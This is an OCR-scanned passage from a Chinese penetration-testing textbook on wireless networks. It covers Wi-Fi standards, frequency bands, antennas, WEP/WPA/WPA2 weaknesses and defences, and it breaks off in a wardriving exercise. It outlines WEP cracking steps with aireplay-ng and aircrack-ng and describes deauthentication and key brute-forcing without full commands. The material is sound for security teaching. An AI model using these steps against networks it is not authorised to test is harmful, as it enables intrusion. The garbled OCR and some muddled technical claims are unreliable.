@ 无 线 网 络 的 履 善 范围 不 如 传统 有 线 网 络 好 。 

@ 由 于 其 他 无 线 设 备 的 存在 和 环境 因素 ， 无 线 网 络 中 常常 存在 干扰 。 干 扰 意 味 痢 性 

能 下 降 ， 连 接 中 断 ， 上 距离 缩 短 等 问题 。 

@ 无 线 网 络 的 性 能 和 有 效 距 离 达 不 到 设备 承诺 的 水 平 ， 往 往 只 有 该 值 的 一 半 。 

@ 安全 是 个 问题 ， 因 为 其 信号 履 凑 的 面积 比 传统 的 有 线 网 络 要 大 很 多 。 

@ 具备 无 线 功 能 的 设备 随处 可 见 ， 其 用 户 往 往 会 寻找 开放 的 接 入 把， 在 很 多 情况 下 

并 不 关心 这 些 接 入 扣 是 否 安 全 。 
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e@ 地 理 和 环境 条 件 可 能 对 网 络 的 覆盖 范围 和 速度 产生 巨大 的 影响 。 空 气 密度 、 树 
木 、 墙 壁 、 温 度 等 条 件 的 变化 都 将 影响 无 线 网 络 的 性 能 。 

无 线 网 络 也 有 很 多 优点 ， 可 以 带 来 很 多 机 会 : 

e@ 在 线 缆 无 法 到 达 的 地 方 也 能 使 用 ， 因 而 更 容易 接 入 。 

e@ 用 于 没有 或 不 能 使 用 有 线 网 络 的 场所 

e@ 极为 普及 的 技术 。 

无 线 网 络 依靠 射频 (Radio Frequency，RF) 信 号 发 送 和 接收 信息 ， 因 此 理解 RF 将 有 助 于 
使 用 这 些 网 络 。 与 以 太 网 一 样 ，Wi_Fi 网 络 也 关注 网 络 的 物理 层 活动 。 物 理 层 定义 网 络 站 
点 如 何 连接 、 发 送 、 接 收 和 格式 化 信号 ， 以 用 于 网 络 (在 此 ， 就 是 指 无 线 网 络 )。 


13.1.1 认识 无 线 网 络 标准 


大 部 分 无 线 网 络 用 户 并 不 知道 存在 多 个 不 同 的 标准 ， 他 们 只 知道 ， 打 开 他 们 最 新 设备 
上 的 Wi-Fi 开 关 就 能 看 到 可 接 入 的 无 线 网 络 。 虽 然 并 不 需要 成 为 一 名 无 线 网 络 工程 师 并 了 
解 每 一 项 技术 的 生僻 细节 才能 破解 无 线 网 络 ， 但 笔者 认为 ， 对 各 项 技术 基础 知识 及 其 菩 容 


性 问题 的 理解 ， 是 渗透 测试 者 要 拥有 的 一 项 宝贵 技能 。 
表 13.1 列 出 了 在 用 的 不 同 无 线 标准 ， 包 括 最 新 的 标准 。 
表 13.1 在 用 的 IEEE 无 线 标准 


类 型 
802.11a 
802.11ac 
802.11b 
802.11g 
802.11n 
蓝牙 

尽管 最 初 的 无 线 网 络 速度 较 慢 ， 除 了 革 些 十 分 特 化 的 环境 之 外 并 不 流行 ， 但 自从 
802.11b 于 21 世 纪 初 登场 以 及 802.11a 在 其 不 久 后 出 现 以 来 ， 新 的 标准 开始 流行 。 当 时 无 线 
网 络 的 使 用 出 现 了 爆炸 式 增 长 ， 但 网 络 速度 依然 不 甚 理想 。 从 无 线 网 络 最 初 推出 开始 ， 
又 出 现 了 诸如 802.11g 和 802.11n 等 标准 ， 使 网 络 速度 得 以 提升 ， 同 时 保持 了 与 旧 标 准 ( 即 
802.11b) 的 兼容 性 。 一 个 无 线 接 入 点 的 例子 如 图 13.1 所 示 。 

最 新 的 标准 802.11ac， 也 被 非 正 式 地 称 为 千 兆 无 线 或 SG 无 线 ， 代 表 了 无 线 技术 领域 的 
最 高 水 平 。 依靠 802.11ac 技 术 的 速度 与 可 用 技术 的 优点 ， 在 未 来 几 年 中 ， 将 能 在 市 场 上 见 
到 更 多 的 802.11ac 设 备 ， 以 及 其 支持 技术 的 不 可 避免 地 涌现 。 一 个 较 新 的 802.11ac 接 入 点 
如 图 13.2 所 示 。 


第 1 和 齐 拧 由 JIK 击 元 续 网 省 辆 9 


图 13.1 一 种 无 线 接 入 点 


图 13.2”802.11ac 接 入 所 


13.1.2 比较 DGHz 和 2.4GHz 无 线 网 络 


除了 显而易见 的 频率 差异 外 ，5GHz 和 2.4 GHz 网 络 有 什么 区 别 ? 2.4GHz 的 高 度 普及 ， 
似乎 说 明了 市 场 已 经 做 出 了 该 频率 更 好 的 选择 ， 但 实际 上 还 有 很 多 因素 需要 考虑 。 该 频率 
体现 出 一 些 限制 ， 虽 然 这 些 限 制 对 于 最 终 用 户 来 说 并 不 明显 ， 但 你 应 当 有 所 了 解 。 

2.4GHz 频 率 最 大 的 问题 之 一 是 它 所 在 的 频谱 比较 拥挤 。 许 多 设备 ， 例 如 无 强 电 话 、 
微波 炉 、 游 戏 控制 器 等 ， 均 运行 在 2.4 GHz 频 段 ， 从 而 与 Wi-Fi 通 信和 竞争 同一 个 频谱 空间 ， 
原因 在 于 2.4GHz 是 一 个 较 旧 的 频段 。 在 人 口 密度 较 大 的 地 区 ， 流 量 、 接 入 点 、 网 卡 以 及 其 
他 设备 的 数量 通常 会 引发 冲突 和 干扰 。 令 问题 愈加 严重 的 是 ， 智 能 手机 和 其 他 移动 设备 也 
会 令 拥堵 雪上 加 有 霜 。 

2.4GHz 的 另 一 个 问题 是 它 基 本 不 受 管制 ， 因 此 高 功率 天 线 、 高 功率 网 卡 和 接 入 点 可 
能 会 对 附近 的 网 络 产生 负面 影响 。 

SGHz 网 络 为 过 度 拥 挤 的 2.4GHz 网 络 提供 了 一 个 替代 方案 。 该 频段 没有 那么 拥堵 ， 而 
且 它 与 只 有 3 个 互 不 重 有 登 的 信道 的 2.4GHz 网 络 不 同 ，S$GHz 网 络 有 23 个 互 不 重 登 的 信道 ， 这 
样 网 络 因为 设备 重合 的 概率 较 低 ， 能 够 更 好 地 处 理 流量 。 每 个 通道 都 有 20MHz 的 带宽 ， 使 
其 可 以 达到 比 2.4GHz 频 段 高 得 多 的 速度 (整个 2.4GHz 频 段 的 宽度 仅 为 80MHz)。 

表 13.2 给 出 了 两 种 标准 的 对 比 。 


174 EE 


表 13.2 ”两 种 频率 的 简要 对 比 


2.4GHZ 5GHZ 
覆 新 范围 。 | 频率 低 、 范 围 广 ， 容 易 穿 过 障碍 物 频率 蜗 、 范 围 窜 ， 不 易 穿 过 障碍 物 
干扰 高 ， 因 为 存在 大 量 同 频 设备 较 少 ， 因 为 普及 度 较 低 
普及 度 普及 度 很 高 ， 受 到 良好 支持 普及 度 不 如 2.4， 但 一 直 在 增长 


成 本 由 于 大 量 设备 默认 文 持 该 频率 ， 成 本 低 ”| 成 本 低 ， 除 非 从 2.4GHz 升 级 到 5$GHz; 此 时 要 考 
虑 将 现存 设备 升级 到 $ 的 成 本 

目前 大 多 数 设 备 都 同时 文 持 这 两 种 频率 ， 所 以 如 何在 两 者 之 间 做 出 选择 不 是 大 问题 ， 
但 其 限制 和 优点 仍 是 客观 事实 。 


13.1.3 ”识别 无 线 网 络 的 组 件 


无 线 技 术 具 有 一 套 特殊 行 话 和 术语 。 可 能 你 并 不 了 解 全 部 术语 ， 但 是 熟悉 它们 非常 重 
要 ， 因 此 本 书 会 介绍 每 个 术语 ， 及 其 含义 或 使 用 场合 。 


服务 集 标 识 符 (Service Set Identifier ，SSID) 

这 是 无 线 接 入 点 广播 的 名 称 ， 用 于 回 潜 在 客户 端 标识 自身 。 你 应 该 已 经 见 过 ， 你 言 
爱 的 无 线 客 户 端 显示 的 可 用 无 线 网 络 列表 中 ， 以 文本 字符 串 的 形式 出 现 的 SSID。 该 名 称 
可 以 由 字母 和 数字 组 合 而 成 。 

SSID 用 于 向 客户 端 标识 无 线 网 络 。 但 是 ， 无 线 网 络 可 以 根据 情况 显示 或 隐藏 其 
SSID。 在 开放 网 络 中 ，SSID 是 可 见 的 ， 任 何 搜索 它 的 客户 端 均 能 看 到 。 在 封闭 的 网 络 
中 ，SSID 不 可 见 ， 有 时 称 其 为 “隐形 ”的 。 


关联 (Association) 
无 线 接 入 点 和 无 线 客 户 端 在 准备 交换 信息 时 的 连接 称 为 关联。 
热点 (Hotspot) 


热 上 是 为 诸如 咖啡 店 、 机 场 、 图 书馆 、 大 厅 或 类 似 地 点 的 区 域 提供 无 线 接 入 的 位 置 。 


接 入 点 (Access Point，AP) 

用 于 建立 无 线 网 络 的 硬件 设备 或 软件 应 用 程序 。 客户 闯 连 接 到 接 入 点 以 使 用 网 络 
服务 。 

在 使 用 消费 电子 商店 销售 的 标准 接 入 点 时 ， 更 换 天 线 不 是 一 个 可 选项 。 人 然而， 对 于 
更 大 、 功 率 更 强 的 企业 接 入 点 ， 天 线 的 选择 就 要 重要 得 多 。 下 文 将 介绍 可 能 会 遇 到 的 不 同 
类 型 的 天 线 ， 以 及 其 对 安全 人 员 有 何 意 义 。 

第 一 种 类 型 的 天 线 如 图 13.3 所 示 ， 是 一 种 称 为 八木 (Yagi) 天 线 的 定向 天 线 。 该 天 线 
采用 单 铝 ， 并 将 RF 信号 聚焦 于 特定 路 径 的 设计 。 该 类 型 天 线 在 站 点 到 站 点 则 传输 需要 聚 
焦 、 可 靠 的 波束 的 应 用 场景 中 十 分 常见 。 从 安全 的 角度 而 言 ， 这 种 类 型 的 天 线 通 过 将 信和 号 
限制 在 较 小 的 区 域 来 提高 安全 性 。 作 为 渗透 测试 者 ， 你 会 发 现 使 用 便携 式 八 木 天 线 在 进行 
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无 线 网 络 调查 或 攻击 时 非常 有 用 。 


图 13.3 ”八木 天 线 


第 二 种 类 型 是 一 种 更 常见 的 天 线 类 型 ， 称 为 全 癌 天 线 。 此 类 天 线 会 同 各 个 方 同 发 出 无 
线 电能 量 ， 但 通常 在 共 些 方向 的 信号 比 其 他 方 同 更 好 。 一 种 全 同 天 线 如 图 13.4 所 示 。 此 类 


天 线 已 成 为 大 多 数 消费 级 接 入 点 、USB 无 线 适 配器 和 其 他 消费 级 设备 的 事实 标准 。 


面 


图 13.4 全 向 天 线 


抛物 面 天 线 在 远 距 离 应 用 中 极为 普遍 。 这 种 类 型 的 天 线 外 形 像 一 个 碟子 ， 是 一 种 高 度 
定 同 的 天 线 ， 因 为 它 在 一 条 轴线 上 发 送 和 接收 数据 。 这 种 天 线 类 型 的 一 大 优点 在 于 其 盘面 
能 够 捕获 平行 的 电波 信号 ， 并 将 其 聚焦 到 单个 接收 点 ; 这 种 特性 显著 提升 了 信号 接收 有 效 
距离 。 在 许多 情况 下 ， 这 种 类 型 的 天 线 可 以 接收 到 10 英 里 距离 外 的 Wi-Fi 信 号 。 一 种 抛物 
面 天 线 如 图 13.5 所 示 。 


图 13.5 ”抛物 面 天 线 


对 于 渗透 测试 者 而 言 ， 该 类 型 的 天 线 在 需要 接 入 到 距离 较 远 的 网 络 时 特别 有 用 。 

需要 注意 的 是 : 图 13.5 的 天 线 采 用 的 是 线 框 ， 而 不 是 实心 板 状 设计 。 对 于 RF 信号 而 
言 ， 碟 形 抛物 面 是 实体 还 是 由 线 框 构成 没有 任何 区 别 ， 其 功能 和 性 能 完全 相同 。 图 13.5 所 
示 的 天 线 设 计 有 助 于 抵抗 大 风 或 雪 的 影响 (可 能 会 影响 实体 原形 天 线 )。 

有 些 时 候 也 会 使 用 如 图 13.6 所 示 的 平板 天 线 。 这 种 类 型 的 天 线 是 很 有 用 的 ， 因 为 它 具 
有 与 八木 天 线 相同 的 优点 ， 但 波束 更 冤 。 它 和 八木 天 线 和 抛物 面 天 线 同 样 ， 也 能 够 发 送 
一 个 强 波束 ， 并 且 接 收 微弱 的 信号 。 


(E- 一 RE 
图 13.6 平板 天 线 


还 有 其 他 一 些 类 型 的 天 线 可 用 于 Wi-Fi 系 统 ， 但 这 些 天 线 要 么 应 用 场景 非常 特殊 ， 要 
么 其 优点 对 于 正常 使 用 场景 早 无 意义 。 
可 以 购买 现成 的 天 线 ， 不 过 对 于 东 些 应 用 ， 目 制 天 线 会 更 好 。 有 一 种 称 为 “ 饮 尖 天 线 
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(cantenna)” 的 自制 天 线 ， 它 是 由 一 个 饶 头 盒 加 上 接收 器 等 制 成 的 ， 如 图 13.7 所 示 。 


瞧 头 天 线 

为 何 要 制作 一 个 挫 头 天 线 ? 最 大 的 原因 是 它们 易于 构造 ， 可 以 定制 ， 易 于 按 特定 的 
目的 进行 调整 ， 并 且 易 于 隐藏 。 过 去 ， 有 的 人 曾 使 用 “ 品 客 ” 茵 片 馈 到 汤 钢 头 的 各 种 馈 
子 制 作 这 种 天 线 。 


13.1.4” ”Wi-Fi 认证 模式 


与 接 入 点 关联 的 客户 器 不 仅 必 须 在 范围 内 并 使 用 正确 协议 ， 而 且 还 必须 执行 茶 种 认 
证 。 认证 有 两 种 主要 类 型 : 


开放 式 

开放 系统 认证 (Open System Authentication，OSA) 用 于 人 允许 任何 客户 疹 连 接 接 入 点 的 
场合 。 当 认证 帧 从 客户 端 发 送 到 接 入 点 (AP) 时 ， 将 发 生 这 种 类 型 的 认证 。 当 AP 接收 到 帧 
时 ， 验 证 其 SSID， 如 果 结 果 正 确 ， 则 AP 加 客户 端 发 送 一 个 验证 帧 ， 从 而 完成 连接 过 程 。 
需要 注意 ， 该 过 程 的 完成 并 不 意味 着 客户 并 能 够 访问 网 络 资源 ， 只 是 客 尸 端 可 以 连接 到 该 
接 入 点 。 


共享 密 钥 式 

共享 密 钥 认 证 与 OSA 不 同 。 客 户 端 提前 接收 密 钥 ， 并 使 用 该 密 钥 连接 到 网 络 。 
下 列 步 又 说 明了 共享 密 钥 认证 的 工作 原理 : 

(1) 客户 端 向 接 入 点 发 送 一 个 认证 请 求 。 

(2) 接 入 点 向 客户 端 返回 一 个 质询 信息 。 
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(3) 客户 端 使 用 其 配置 的 共享 密 钥 对 质询 信息 进行 加 密 。 
(4) 接 入 乓 使 用 相同 的 共 至 密 钥 解密 质询 信息 ; 如 果 啊 应 匹配 ， 则 客户 端 认证 通过 并 
锯 授 予 访问 网 络 的 权限 。 


13.2 ”攻破 无 线 加 密 技 术 


无 线 网 络 对 公司 吸引 力 不 足 的 原因 之 一 殉 是 安全 性 缺失 或 薄弱 。 由 于 无 线 网 络 通过 
空间 传输 信号 ， 所 以 信息 比 在 有 线 网 络 上 更 容易 受到 攻击 。 如 果 没 有 充分 的 保护 ,信息 
易于 被 第 三 方 咒 探 甚至 捕获 。 为 了 克服 这 个 问题 ， 通 常会 采用 加 密 措 施 ， 以 降低 拦截 的 
可 能 性 。 

下 面 是 用 于 保护 无 线 网 络 的 三 种 最 常用 的 技术 : 


有 线 等 效 保密 (Wired Equivalent Privacy，WEP) 
最 早 和 最 弱 的 技术 ，WEP 标 准 是 提供 无 线 安 全 的 最 初 尝试 ， 在 其 出 现 后 不 入 ， 就 被 发 
现存 在 缺陷 ， 十 分 易 受 攻击 。 


Wi-Fi 保 护 访 问 (Wi-Fi Protected Access，WPA) 

WPA 作 为 WEP 的 主要 后 继 者 ， 旧 在 解决 WEP 的 诸多 安全 问题 。 虽 然 它 成 功 地 解决 了 
许多 问题 ， 比 WEP 要 强大 得 多 ， 但 它 仍然 存在 一 些 漏 洞 。 WPA 使 用 TKIP 和 AES 加 密 作为 
其 保护 信息 的 主要 机 制 。 


WPA2 
WPA2 是 WPA 的 后 继 者 ， 虽 在 解决 WPA 中 的 问题 。 WPA2 更 为 强大 ， 并 采用 更 强 的 
AES 和 CCMP 形 式 的 加 密 。 该 标准 还 有 一 个 使 用 更 强 系统 (如 EAP 和 TKIP) 的 版 本 。 WPA2 
还 分 别针 对 个 人 和 企业 提供 了 不 同 的 部 署 方法 
这 些 安全 协议 看 似 字 和 母 排 列 都 差不多 ， 那 么 到 底 哪 种 最 好 用 ? 哪 种 最 脆弱 ? 哪 种 最 
强 ? 接 下 来 就 将 分 门 别 类 地 阐述 网 络 无 线 安 全 。 


13.2.1 破解 WEP 


当 无 线 网 络 首次 公开 推出 时 ， 其 安全 性 需求 就 已 显而易见 ， 无 线 网 络 的 创造 者 使 用 
WEP 来 提供 这 种 能 力 。WEP 是 可 用 于 无 线 网 络 的 最 早 的 安全 协议 ， 也 是 最 脆弱 的 。 

当 WEP 最 初 与 802.11b 标 准 一 同 推出 时 ， 其 目标 是 使 无 线 网 络 与 有 线 网 络 一 样 安全 。 
不 过 ， 事 实证 明 ， 这 种 技术 并 未 达到 要 求 。 从 表面 上 看 ，WEP 似 乎 是 一 种 优良 的 技术 ， 它 
使 用 了 众所周知、 口碑 良好 的 加 密 协 议 (如 RC4)， 但 实际 上 其 实现 非常 差 。 目 前 已 知 它 是 
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最 弱 的 无 线 安 全 协议 。 虽 然 提 出 WEP 协 议 时 本 意 民 好 ， 但 实际 上 十 分 薄弱 。 究 其 原因 ， 
WEP 是 由 不 熟悉 密码 学 的 人 员 设 计 ， 并 且 没 有 寻求 熟悉 该 技术 者 的 帮助 。 因 此 ， 在 WEP 
设计 过 程 中 所 使 用 的 优良 技术 ， 如 RC4， 并 未 得 到 有 效 使 用 。 

WEP 则 在 提供 以 下 功能 : 

@ 防止 通信 和 鳃 昕 ， 减 少 未 经 授权 的 数据 泄露 

@ 检查 整个 网 络 中 的 流动 的 数据 的 完整 性 

@ 使 用 一 个 共享 密 钥 在 传输 之 前 加 密 数 据 包 

@ 通过 一 个 轻 量 级 、 高 效率 的 系统 ， 提 供 机 密 性 、 访 问 控 制 和 完整 性 

其 问题 源 于 以 下 情况 : 

@ 协议 设计 时 没有 征询 学 术 界 的 意见 。 

@ 该 协议 没有 密 钥 分 发 机 制 ， 而 依赖 于 预 共 享 密 钥 。 由 于 工作 量 问题 ， 导 致 许多 用 

户 永 远 不 会 更 改 密 钥 。 

@ 攻击 者 获得 足够 的 密 文 和 明文 后 ， 即 可 分 析 和 获得 密 钥 。 

无 疑 ， 你 对 WEP 协 议 的 糟糕 和 不 堪 使 用 已 早 有 耳 于 。 接 下 来 将 介绍 的 是 如 何 破 解 
WEP， 说 明 其 过 程 和 组 合 使 用 各 种 技术 的 方法 。 

要 从 头 到 尾 执行 此 破解 过 程 ， 包 括 破 解密 钥 的 过 程 ， 请 按照 下 列 步 又 操作 : 

(1) 在 接 入 点 的 特定 频道 上 ， 以 监控 模式 启动 攻击 系统 上 的 无 线 接口 。 此 模式 用 于 观 
察 数据 包 ， 但 不 连接 到 任何 接 入 点 。 

(2) 使 用 无 线 设备 探测 目标 网 络 ， 以 确定 是 否 可 以 执行 数据 包 注 入 。 

(3) 选择 aireplay-ng 等 工具 ， 对 接 入 点 进行 虚假 认证 。 

(4) 启动 Wi-Fi 嗅 探 工具 以 捕获 初始 化 向 量 (Initialization Vectors，IV)。 如 果 使 用 
aireplay-ng， 可 以 拦截 ARP 请 求 报 文 并 重新 注入 网 络 ， 导 致 生成 更 多 的 报 文 ， 以 供 捕获 。 

(5) 运行 Cain & Abel 或 aircrack-ng 等 工具 ， 从 流量 数据 中 提取 加 密 密 钥 。 


13.2.2 ”从 WEP 转 换 到 WPA 


在 发 现 WEP 有 非常 严重 、 无 法 弥补 的 缺陷 后 ， 人 们 引入 了 Wi-Fi 保护 访问 (Wi-Fi 
Protected Access，WPA) 机 制 。WPA 设 计 为 一 种 软件 升级 ， 而 不 需要 完全 的 硬件 升级 ， 从 
而 可 以 通过 服务 包 或 软件 更 新 简单 地 实现 。 

WPA 协 议 引 入 的 最 重要 的 变化 是 使 用 TKIP 系 统 增强 了 数据 加 密 。TKIP 是 一 种 用 于 定 
期 动态 更 改 密 钥 的 协议 ， 相 比 之 下 ，WEP 将 在 人 们 物理 更 改 密 钥 前 ， 使 用 相同 的 密 钥 。 这 
一 动态 密 钥 更 改 特性 使 得 WPA 比 WEP 更 难 破解 。 

WPA 受 以 下 缺陷 影 啊 : 

@ 用 户 选择 的 弱 密 码 

@ 数据 包 其 骗 
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13.2.3 ”破解 WPA 和 WPA2 


要 破解 WPA， 必 须 使 用 不 同 于 破解 WEP 的 方法 。 幸 运 的 是 ，Kali Linux 中 有 最 好 的 
WPA 攻 击 工具 之 一 ，Reaver， 人 免费 可 用 。Reaver 能 够 通过 尝试 获 取 用 于 访问 网 络 的 WPA 预 
共享 密 钥 信息 ， 利 用 无 线路 由 器 中 的 漏洞 。 

WPA2 是 WPA 的 升级 ， 用 于 修复 原始 协议 的 缺陷 。WPA 大 大 增强 了 安全 性 ， 同 时 保持 
对 802.11i 标 准 的 兼容 。 

WPA 和 WPA2 都 饱 受 可 供 渗透 测试 者 利用 的 漏洞 困扰 。 每 个 漏洞 都 提供 了 一 种 攻破 在 
其 他 方面 很 强大 的 协议 安全 机 制 的 途径 。 

那么 ， 如 何 攻 击 WPA 和 WPA2 呢 ? 


离线 攻击 (Offline Attack) 

离线 攻击 需要 足够 靠近 接 入 点 ， 分 析 客 户 端 和 接 入 点 间 称 为 “握手 ”的 过 程 。 握 手 是 
指 初始 连接 尝试 时 发 生 的 认证 或 关联 过 程 。 由 于 此 时 会 进行 初始 同步 或 密 钥 交换 ， 需 要 做 
的 ， 就 是 监视 和 捕获 该 过 程 ， 并 离线 破解 密 钥 。 离 线 攻 击 之 所 以 有 效 ， 是 因为 握手 信息 每 
一 次 都 是 使 用 明文 ， 所 以 能 够 积累 足以 获取 密 钥 的 信息 。 


解 认 证 攻击 (Deauthentication Attack) 

该 类 型 的 攻击 用 于 解决 监视 客户 问 和 AP 之 则 握手 过 程 的 问题 ， 欺 骗 二 者 中 断 并 重新 
连接 (从 而 重复 握手 过 程 以 便 监视 )。 与 离线 攻击 十 分 类 似 。 解 认证 攻击 需要 捕获 握手 过 程 
并 人 破解 密 钥 。 


提取 密 钥 
在 每 个 客户 端 都 输入 了 预 共 享 密 钥 的 情况 下 ， 可 以 物理 访问 客户 端 ， 并 从 中 获取 
密 钥 。 


暴力 破解 WPA 密 钥 

技术 含量 最 低 的 攻击 是 古老 的 暴力 破解 。 这 种 攻击 通常 使 用 诸如 aircrack、aireplay 或 
KisMac 之 类 的 工具 ， 烘 力 破 解密 钥 。 这 种 攻击 的 缺点 是 解 出 密 钥 可 能 需要 很 长 时 间或 大 
量 计算 能 力 。 攻 击 也 可 能 会 锁定 接 入 点 ， 或 触发 攻击 检测 机 制 。 

虽然 也 可 以 使 用 基于 Linux 的 工具 (如 Kali Linux 或 aircrack-ng 套 件 ) 进 行 这 些 攻 击 ， 但 还 
有 其 他 可 用 选项 。 一 个 名 叫 Pwnie Express 的 公司 ， 推 出 了 两 种 设备 Pwn Pad 和 Pwn Phone， 
能 够 使 得 无 线 网 络 的 破解 比 以 往 任何 时 候 都 容易 。 这 两 种 设备 都 提供 了 一 套 内 置 的 工具 ， 
用 于 各 种 安全 审核 和 测试 ， 其 中 包括 能 够 快速 破解 WEP、WPA 和 WPA2 的 工具 。 两 者 都 具 
有 使 用 诸如 Nexus 5 和 Nexus 7 之 类 的 现成 硬件 的 优点 ， 这 使 得 它们 非常 容易 隐藏 。 当 有 第 
三 方 检查 它们 ， 人 外观 不 会 过 于 可 疑 。 缺点 是 它们 售 价 相当 昂贵 一 一 每 台 一 干 美元 以 上 。 

虽然 可 以 购买 Pwn Pad 或 Pwn Phone 等 设备 ， 但 它们 可 能 不 是 最 佳 或 最 具 效 费 比 的 选 
择 。 这 两 种 设备 都 可 以 通过 从 eBay 购买 相应 的 平板 电脑 或 手机 ， 并 使 用 Pwnie Express 提 供 
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的 免费 版 本 ( 称 为 社区 版 ) 的 操作 系统 ， 进 行 自 制 。 

还 可 以 使 用 流行 程度 高 得 多 的 Kali Linux 渗透 测试 操作 系统 的 Kali NetHunter 版 本 ， 从 
头 开始 制作 自己 的 设备 。 选 择 这 条 路 线 的 好 处 ， 是 该 系统 可 以 在 更 多 的 硬件 设备 上 工作 ， 
更 灵活 、 文 档 完 善 得 多 、 高 度 可 定制 一 一 并 且 免 费 。 


13.2.4 了 解 无 线 部 署 选项 


有 多 种 方式 部 署 无 线 网 络 。 作 为 一 名 渗透 测试 者 ， 应 该 了 解 这 些 不 同 的 类 型 ， 因 为 它 
们 可 能 在 以 后 计划 或 实施 渗透 测试 时 有 用 。 了 解 各 种 类 型 的 无 线 网 络 部 署 ， 对 于 规划 攻击 
时 极 有 帮助 。 例 如 ， 识 别 出 一 个 4G 热 点 ， 可 能 使 你 能 够 定位 一 个 使 用 其 手机 连接 到 该 无 
线 网 ， 同 时 仍然 连接 到 物理 的 用 户 。 在 这 种 情况 下 ， 该 用 户 可 能 打开 了 一 个 接 入 主 网 络 的 
后 门 。 如 果 希 望 执行 拒绝 服务 攻击 并 切断 不 同位 置 之 间 的 连接 ， 则 以 点 对 点 WLAN 作 为 攻 
击 目标 可 能 会 有 效 。 

现在 建立 无 线 网 络 的 常见 方法 之 一 是 使 用 3G/4G 热 点 。 3G/4G 热 点 是 通过 使 用 一 个 特 
殊 的 具备 蜂窝 网 络 功能 的 接 入 点 ， 或 是 一 台 只 需要 简单 地 “ 按 ” 某 个 按钮 即 可 转换 成 一 个 
接 入 点 的 手机 部 署 的 无 线 网 络 。 这 些 类 型 的 设备 十 分 和 常见， 因为 几乎 每 台 智 能 手机 都 将 该 
功能 作为 一 项 标准 功能 。 一 个 4G 热 点 的 例子 如 图 13.8 所 示 。 
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图 13.8 ”4G 热 点 


使 用 蜂窝 接 入 点 的 网 络 具 有 为 一 个 共同 特性 : 它们 的 外 形 。 许 多 此 类 接 入 点 外 形 太 十 
很 小 ， 并 且 可 能 使 用 手机 或 平板 电脑 的 形式 。 这 两 种 设备 说 明了 此 类 接 入 点 的 一 个 优点 ， 
同时 也 是 一 个 安全 问题 ， 它 们 看 起 来 不 像 一 个 接 入 后 ， 并 且 只 是 一 个 极为 第 见 的 设备 的 组 
成 部 分 。 这 样 的 设备 可 以 很 容易 地 隐藏 起 来 ， 并 且 与 随身 携带 的 日 常用 品 混在 一 起 ， 
此 不 会 引起 怀疑 。 

对 现 有 网 络 的 扩展 是 一 种 使 用 连接 到 有 线 网 络 的 接 入 点 ， 以 进一步 扩展 现 有 网 络 的 
窗 谭 范围 的 网 络 部 绪 类 型 。 有 趣 的 是 ， 在 这 种 类 型 的 网 络 上 使 用 的 接 入 操 可 以 是 硬件 或 软 


件 。 后 一 类 型 的 接 入 点 (软件 型 ) 通 弟 是 通过 将 无 线 适 配器 共享 到 其 他 设备 ， 从 而 令 其 可 连 
接 到 客户 问 实 现 。 这 种 网 络 部 普 的 示意 图 如 图 13.9 所 示 。 
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图 13.9 ”无线 接 入 点 部 署 的 例子 


多 接 入 扣 是 男 一 种 常见 的 部 署 类 型 ， 它 使 用 多 个 接 入 扣 以 实现 大 面积 覆 荔 。 与 蜂窝 网 
络 很 类 似 ， 这 种 类 型 的 部 署 需要 接 入 氮 在 一 定 程度 上 彼此 重 登 ， 从 而 使 得 客户 端 可 在 各 个 
AP 间 漫 游 而 不 会 中 断 连接 。 在 酒店 、 会 议 中 心 和 学 校 等 地 点 ， 会 经 种 见 到 这 样 的 部 普 ， 
并 提供 供 客 尸 按 需 连接 的 多 个 接 入 上 操 。 使 用 这 种 实现 方式 时 ， 要 求 每 个 接 入 扣 与 其 相 邻 接 
入 点 的 履 兰 范围 有 一 定 程度 的 重 登 。 如 果 设 置 正确 ， 这 种 类 型 的 网 络 使 得 客户 问 可 以 无 
颖 地 漫游 ， 而 不 会 于 失 连接 。 多 接 入 后 部 曹 的 一 个 示例 如 图 13.10 所 示 。 


图 13.10 多 接 入 点 部 署 的 示例 
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LAN 到 LAN 无 线 网 络 使 得 物理 位 置 接近 的 不 同 网 络 可 通过 无 线 技术 连接 。 该 技术 的 优 
点 是 ， 可 以 在 (如 果 不 使 用 该 技术 ) 可 能 不 得 不 使 用 更 昂贵 的 连接 解决 方案 (例如 雇 人 挖 开 道 
路 以 铺设 实体 线 绕 ) 的 位 置 之 间 建立 网 络 连 接 。 这 种 类 型 的 部 团 有 时 也 被 称 为 地 点 到 地 点 
(site-to-site) 无 线 局 域 网 (WLAN)。 


13.2.5 ”防护 WEP 和 和 WPA 攻击 


如 何 阻止 上 文 介绍 的 针对 WEP 和 WPA 的 多 种 攻击 ?除了 加 密 和 其 他 机 制 以 外 ， 还 有 
一 些 消 费 者 常用 的 领先 技术 ， 包 括 下 列 这 些 : 
@ 使 用 一 个 复杂 的 密码 或 短语 作为 密 钥 。 使 用 之 前 你 了 解 的 密码 规则 ， 可 以 为 AP 创 
建 一 个 强 密码 。 
在 客户 侧 使 用 服务 器 验证 ， 以 使 客户 端 能 够 对 其 连接 的 AP 进行 验证 。 
如 果 WPA2 可 用 ， 据 弃 WEP 和 WPA， 并 转移 到 WPA2。 
使 用 加 密 标 准 ， 例 如 CCMP、AES 和 TKIP。 
在 接 入 点 上 使 用 MAC 地 址 过 滤 。 
在 路 由 器 中 禁用 SSID 广 播 选 项 。 
在 了 解 了 各 种 安全 技术 后 ， 现 在 首先 需要 知道 的 是 ， 如 何 找 到 一 个 无 线 网 络 。 


13.3 ”进行 Wardriving 攻击 


Wardriving( 战 争 驾驶 攻击 ) 是 定位 无 线 网 络 的 常用 手段 。 在 该 攻击 中 ， 攻 击 者 携带 一 
台 安装 了 无 线 网 卡 和 用 于 探测 无 线 客户 端 和 接 入 点 的 软件 的 计算 机 ， 或 者 移动 设备 ， 驾 车 
巡回 于 某 个 区 域 ， 以 寻找 该 区 域 中 的 无 线 网 络 。 


练习 13.1: 准备 进行 Wardriving 攻 击 

在 本 练习 中 ， 将 设置 和 配置 一 个 用 于 Wardriving 行 动 的 系统 。 本 练习 提供 执行 此 
操作 所 需 的 一 般 性 步骤 ， 但 特定 步骤 可 能 需要 根据 你 的 不 同 硬件 和 设置 修改 。 

特别 提醒 : 执行 这 个 练习 时 要 牢记 安全 和 法 律 。 如 果 选 择 使 用 此 设置 实际 区 
驶 ， 请 记 住 ， 应 该 在 开车 前 首先 启动 系统 ， 并 在 停车 时 进行 扫描 。 应 该 将 笔记 本 电 
脑 放 置 在 汽车 的 副 轨 驶 位 置 的 地 板 上 或 后 座 上 。 上 此外， 笔记 本 电脑 屏 疾 不 应 阻挡 司 
